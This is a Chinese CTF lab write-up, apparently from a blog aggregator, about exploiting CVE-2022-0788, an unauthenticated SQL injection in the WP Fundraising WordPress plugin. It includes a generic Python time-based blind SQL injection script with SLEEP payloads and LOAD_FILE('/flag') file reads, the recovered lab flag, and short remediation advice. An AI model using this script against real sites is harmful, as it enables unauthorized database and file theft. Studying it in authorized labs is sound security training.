当前位置: 首页 > news >正文

春秋云镜靶场漏洞复现:CVE-2022-0788 WP Fundraising REST SQL 注入

环境:春秋云境“免费空间”授权实验靶场。历史实例已关闭。

1. 基本信息

项目 内容
CVE CVE-2022-0788
产品 WP Fundraising Donation and Crowdfunding Platform 1.4.2
条件 未认证 REST 路由
漏洞类型 SQL 时间盲注
Flag flag{5c10e0b4-30eb-4d2c-907f-5647ec4cc7ba}

2. 原理与复现

插件 REST 路由接受 GET 请求体 JSON,并把其中的参数拼入 SQL。授权请求结构:

GET /<插件 REST 路由> HTTP/1.1
Host: <WordPress-靶场域名>
Content-Type: application/json{"<参数>":"<SLEEP 条件>"}

以响应延时判断 flag 表字符,循环得到:

flag{5c10e0b4-30eb-4d2c-907f-5647ec4cc7ba}

Python 爆破脚本(时间盲注)

仅对本题授权靶场使用。先按本文关键请求设置 URL、METHOD、LOCATION、FIELD、SOURCE、基础表单和 Cookie;SOURCE 使用本题已确认的 flag 表达式或 /flag 读取表达式。

import string
import time
import requestsURL = "https://<authorized-target>/<endpoint>"
METHOD = "POST"                 # GET 或 POST
LOCATION = "form"               # form、query 或 cookie
FIELD = "user_name"
SOURCE = "LOAD_FILE('/flag')"   # 或 (SELECT flag FROM ctf.flag LIMIT 1)
BASE_DATA = {"password": "<value>"}
BASE_COOKIES = {}
DELAY = 3.0
THRESHOLD = 2.0
MAX_LEN = 80
ALPHABET = string.ascii_letters + string.digits + "{}_@.-,:/"session = requests.Session()def send(payload):if LOCATION == "cookie":cookies = dict(BASE_COOKIES)cookies[FIELD] = payloadreturn session.request(METHOD, URL, cookies=cookies, timeout=DELAY + 5)if LOCATION == "query" or METHOD == "GET":return session.get(URL, params={FIELD: payload}, timeout=DELAY + 5)data = dict(BASE_DATA)data[FIELD] = payloadreturn session.post(URL, data=data, timeout=DELAY + 5)def extract_flag():result = ""for pos in range(1, MAX_LEN + 1):for ch in ALPHABET:code = ord(ch)payload = (f"' AND IF(ASCII(SUBSTRING({SOURCE},{pos},1))={code},"f"SLEEP({DELAY}),0)-- -")started = time.monotonic()send(payload)if time.monotonic() - started >= THRESHOLD:result += chprint(f"{pos:02d}: {result}", flush=True)breakelse:breakif result.endswith("}"):breakreturn resultif __name__ == "__main__":print("recovered:", extract_flag())

脚本逐位置遍历候选字符,条件为真时触发 SLEEP,并以超过 THRESHOLD 的耗时作为 oracle。运行前先用已知真假条件校准 DELAY/THRESHOLD,并把候选字符集限制在题目实际 Flag 格式内。

3. 修复建议与验证

为 REST 路由增加认证/权限校验,使用参数化查询并禁用详细 SQL 错误。Flag 与平台记录一致,已提交并关闭。原始路由、字段和阈值未保存,截图已保存到 images 目录并由平台详情页复核。

截图证据

题目详情与已攻克状态

题目状态与 Flag 验证区域

http://www.jsqmd.com/news/1400998/

相关文章:

  • 移动端自动化工作流:TRAE SOLO如何实现手机端Agent智能调度
  • AI Agent白手起家74: CrewAI 核心组件详解——从智能体到知识库
  • Claude Code Hook机制:从AI助手到团队工程化基础设施的进阶实践
  • 安防监控YOLO全栈方案:人员入侵检测+行为分析+跟踪算法一体化实现
  • 春秋云镜靶场漏洞复现:CVE-2022-2073 Grav CMS Twig `system` 过滤器 RCE
  • 人生代码 | 第4关:输入要节制 -- 节奏失控,努力白忙
  • YOLOv8 八类人脸表情识别全栈工程|8038 张 VOC/YOLO 数据集、PyQt5 精美 GUI、ONNX 量化推理、全套训练评估曲线落地
  • 基于 Spring Boot + Vue3 的校园管理系统
  • Python字符串操作全解析:从基础增删改查到高效编程实践
  • LVS负载均衡彻底搞懂:三种工作模式原理与DR模式实战踩坑全记录
  • 阿里云Elasticsearch 9.4 Agent Builder:构建智能体,重塑搜索驱动型应用开发
  • 破解物理AI技术困局(33):TVA达成意图预判与主动配合
  • Token钱包下载APP代码开发流程
  • YOLOv8 飞鸟智能预警全栈工程|单类别 VOC/YOLO 航拍数据集、PyQt5 精美 GUI、ONNX 量化推理、全套训练评估曲线落地
  • 蓝速科技可移动多媒体智慧讲台:分散场地下的灵活选型实测
  • Spring Boot WebClient 从入门到精通:非阻塞HTTP客户端实战指南
  • Kimi LeetCode 3910. 统计节点和为偶数的连通子图 Java实现
  • 随手拍也能变成杂志大片:最近值得玩的 9 个照片处理 Skill
  • 【寄电瓶车到外省哪个物流便宜?2026价格对比与推荐,看完不再踩坑】 - 快递物流资讯
  • 换模小车,工厂注塑压铸模具移位简易高效设备 - 优企甄选
  • 春秋云镜靶场漏洞复现:CVE-2022-1014 WP Contacts Manager 未认证 SQL 注入
  • 第5章,[Win32 章节] :边框绘制函数(四)
  • HTX火币钱包官方网站代码全流程
  • 还在为Wand专业版续费?试试这款开源增强器,解锁Pro还送手机遥控
  • 构建可控AI Agent:从ReAct架构到安全实践
  • 小帅VXhook框架
  • Hydro SPJ 配置:告别答案唯一!
  • 春秋云镜靶场漏洞复现:CVE-2022-0948 Order Listener for WooCommerce REST SQL 注入
  • DBeaver数据库管理工具:一站式跨数据库连接与SQL编辑实战指南
  • 朝闻通品牌传播有哪些优势?全域媒体资源与全链条服务详解